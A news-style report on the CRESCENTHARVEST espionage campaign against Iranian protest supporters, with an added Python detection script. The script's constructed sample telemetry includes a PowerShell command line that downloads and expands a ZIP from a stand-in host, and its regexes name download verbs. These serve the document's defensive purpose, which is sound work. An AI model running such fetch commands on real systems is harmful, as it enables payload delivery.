Cybersecurity researchers have disclosed details of a campaign dubbed CRESCENTHARVEST that likely targets supporters of Iran's protests for information theft and long-term espionage. The Acronis Threat Research Unit said it observed the activity after 9 January; the attacks are designed to deliver a remote access trojan and information stealer that execute commands, log keystrokes, and exfiltrate data, though it is not yet known whether any attacks succeeded.
The campaign lures victims with a malicious RAR archive that bundles authentic protest media and a Farsi-language report alongside two Windows shortcut (.LNK) files disguised as images or videos. Once a shortcut is launched, PowerShell code retrieves a further ZIP archive, and a legitimate Google-signed binary together with two rogue DLLs is used to run the payload, which includes the CRESCENTHARVEST DLL and a signed loader that harvests system data and keystrokes.
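The first two stages of that chain (a shortcut disguised as a media file, then explorer-spawned PowerShell fetching and unpacking an archive) leave telemetry that a defender can match on. The following is an added illustration, not code from Acronis or the report: it runs two simple heuristics over constructed, simplified Sysmon-style FileCreate and ProcessCreate records; the paths, file names and the example.invalid URL are all made up.

```python
import re

# Constructed sample telemetry (not taken from the report), simplified to the
# fields the heuristics need. Real Sysmon records carry many more fields.
SAMPLE_EVENTS = [
    {"type": "FileCreate", "path": r"C:\Users\u\Downloads\protest_video.mp4.lnk"},
    {"type": "FileCreate", "path": r"C:\Users\u\Downloads\report.pdf"},
    {"type": "ProcessCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -c \"iwr https://example.invalid/p.zip -OutFile "
                "$env:TEMP\\p.zip; Expand-Archive $env:TEMP\\p.zip\""},
    {"type": "ProcessCreate",  # benign: PowerShell launched by a dev tool
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\VSCode\Code.exe",
     "cmdline": "powershell -File build.ps1"},
]

# Shortcut whose name ends in <media extension>.lnk, i.e. a file posing as an
# image or video; Explorer hides the trailing .lnk by default.
MEDIA_EXT = ("jpg", "jpeg", "png", "gif", "mp4", "mov", "avi", "mkv")
MASQ_LNK = re.compile(r"\.(%s)\.lnk$" % "|".join(MEDIA_EXT), re.IGNORECASE)
# Download / archive-expansion verbs that rarely appear in user-initiated
# PowerShell started by double-clicking something in Explorer.
FETCH_HINTS = re.compile(
    r"(iwr|invoke-webrequest|downloadfile|downloadstring|"
    r"start-bitstransfer|expand-archive|\.zip\b)", re.IGNORECASE)


def check_event(ev):
    """Return a list of alert strings for one event (empty if nothing matches)."""
    alerts = []
    if ev["type"] == "FileCreate" and MASQ_LNK.search(ev["path"]):
        alerts.append("masquerading shortcut: " + ev["path"])
    elif ev["type"] == "ProcessCreate":
        is_ps = ev["image"].lower().endswith(("powershell.exe", "pwsh.exe"))
        from_explorer = ev["parent"].lower().endswith("explorer.exe")
        if is_ps and from_explorer and FETCH_HINTS.search(ev["cmdline"]):
            alerts.append("explorer-spawned PowerShell fetching/expanding an "
                          "archive: " + ev["cmdline"][:60])
    return alerts


def scan(events):
    """Apply check_event to every record and collect the alerts in order."""
    out = []
    for ev in events:
        out.extend(check_event(ev))
    return out


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Both rules are deliberately narrow to keep false positives low; a later stage (the signed binary loading DLLs from its own directory) would need ImageLoad telemetry and is not covered here.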
The actors reportedly rely on spear-phishing or protracted social engineering, and the CRESCENTHARVEST toolset communicates with its C2 server via the Windows WinHTTP API. According to Acronis, the initial access vector remains unknown, but the operation appears to reflect established tradecraft used in targeted cyber espionage against journalists, activists, and diaspora communities.